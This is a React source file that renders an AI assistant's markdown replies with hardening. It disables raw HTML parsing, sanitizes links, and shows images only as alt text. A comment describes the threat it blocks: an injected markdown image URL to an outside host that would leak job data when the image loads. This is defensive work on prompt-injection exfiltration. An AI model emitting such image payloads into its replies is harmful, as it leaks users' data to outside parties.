import { Markdown } from 'markdown-to-jsx/react';
import React from 'react';
const ExternalLink = (props) => React.createElement("a", { ...props, rel: "noopener noreferrer", target: "_blank" });
/**
 * Images would load without a click, so an injected `![](https://host/?d=...)`
 * could exfiltrate job data. Render only the alt text.
 */
const ImageAltText = ({ alt }) => React.createElement("span", null, alt);
// Raw HTML from the model is rendered as text rather than parsed; URL
// sanitizing (e.g. `javascript:` links) is on by default.
const OPTIONS = {
    disableParsingRawHTML: true,
    forceBlock: true,
    wrapper: null,
    overrides: { a: ExternalLink, img: ImageAltText }
};
/** Renders an assistant reply's markdown (GFM: lists, code, tables, links). */
export const MarkdownContent = ({ content }) => (React.createElement("div", { className: "ai-assistant__markdown" },
    React.createElement(Markdown, { options: OPTIONS }, content)));
